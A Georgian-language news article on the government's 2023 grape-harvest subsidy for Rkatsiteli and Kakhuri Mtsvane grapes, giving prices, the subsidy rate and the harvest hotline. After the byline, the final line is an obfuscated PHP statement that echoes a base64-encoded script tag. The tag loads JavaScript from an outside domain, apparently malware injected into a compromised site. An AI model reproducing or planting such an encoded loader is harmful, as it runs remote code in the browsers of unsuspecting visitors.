celsiusi
ავერსი საქკაბელი

2023 წლის რთველის სეზონის მოახლოებასთან ერთად, საქართველოს მთავრობა მორიგი სუბსიდირების პროგრამის დასაწყებად ემზადება. პროგრამის წინასწარი ბიუჯეტი 60 მილიონი ლარია და მისი მეშვეობით 60-70 ათასი ტონა ყურძნის თანადაფინანსება არის განსაზღვრული. დღეს სოფლის მეურნეობის სამინისტრომ გამოაქვეყნა დამატებითი ინფორმაცია რქაწითელის და კახური მწვანეს ჯიშების ყურძნის სუბსიდირების შესახებ.

“საქართველოს მთავრობის გადაწყვეტილებით, სახელმწიფო სუბსიდიას მიიღებს ის კომპანია, რომელიც 2023 წლის რთველის განმავლობაში შეიძენს და გადაამუშავებს კახეთის რეგიონში მოწეულ არანაკლებ 100 ტონა რქაწითელის და/ან კახური მწვანის ჯიშის ყურძენს. ამასთან, შესყიდული 1 კგ ყურძნის სანაცვლოდ, ყურძნის ჩამბარებელს გადაუხდის არანაკლებ 0,90 ლარისა. კახეთის რეგიონში მევენახის მიერ მოწეული ყურძნის შესყიდვის სანაცვლოდ, კომპანიებზე გასაცემი სუბსიდია შეადგენს 1კგ რქაწითელისა და 1 კგ კახური მწვანისათვის  0,20 ლარს.

რთველი 2023-ის ორგანიზებულად ჩატარების მიზნით, ქალაქ თელავში რთველის საკოორდინაციო შტაბი 24 საათიანი რეჟიმით იმუშავებს. დაინტერესებულ პირებს რთველთან დაკავშირებული ინფორმაციის მიღება შეუძლიათ გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროს ცხელ ხაზზე - 1501.

გასულ წელს, სახელმწიფო სუბსიდია 1კგ რქაწითელისა და  1კგ კახური მწვანისათვის  0,35 ლარს შეადგენდა.

აღსანიშნავია, რომ სახელმწიფოს მხრიდან უკანასკნელ წლებში მევენახეობა-მეღვინეობის დარგში განხორციელებულმა სწორმა პოლიტიკამ დარგი მნიშვნელოვნად გააძლიერა: გაშენდა ახალი ვენახები, შეიქმნა ახალი საწარმოები, გაუმჯობესებულია ღვინის ხარისხი, გაფართოვდა საექსპორტო ბაზრების არეალი, რეკორდულ რაოდენობამდე გაზრდილია ღვინის ექსპორტი და ყურძნის მოსავალი, მუშაობს აგროკრედიტისა და აგროდაზღვევის სისტემა,”- აცხადებს გარემოს დაცვისა და სოფლის მეურნეობის სამინისტრო.

ავტორი
მირანდა შურღაია
249
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");